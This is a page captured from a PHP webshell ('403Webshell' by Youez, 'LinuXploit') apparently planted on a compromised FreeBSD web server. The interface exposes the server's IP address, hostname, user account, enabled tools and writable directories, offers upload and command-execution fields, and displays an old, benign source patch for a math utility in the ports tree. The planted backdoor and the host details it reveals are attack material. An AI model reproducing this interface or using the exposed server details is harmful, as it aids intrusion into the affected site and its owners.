403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/math/eval/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/math/eval/files/patch-funcs.c
--- /tmp/Eval/source/funcs.c	Tue Apr 13 21:04:40 1993
+++ funcs.c	Wed Mar 16 04:31:35 1994
@@ -52,16 +52,6 @@
 
 #include   "eval.h"
 
-#define MAXALEN     3
-#define MAXDLEN     80
-
-typedef struct {
-               int     id;
-               char    name[MAXFLEN+1];
-               char    argspec[MAXALEN+1];
-               char    desc[MAXDLEN+1];
-               } FUNC, *FUNCPTR;
-
 #define    ABSVAL      1
 #define    ACOS        2
 #define    ACOSH       3
@@ -93,7 +83,7 @@
 #define    TAN         29
 #define    TANH        30
 
-static FUNC    flist[NUMFUNCS] =
+FUNC    flist[NUMFUNCS] =
 {
 {ABSVAL,"abs",    "x",  "absolute value"                              },
 {ACOS,  "acos",   "x",  "arccosine, return value in radians"          },

Youez - 2016 - github.com/yon3zu
LinuXploit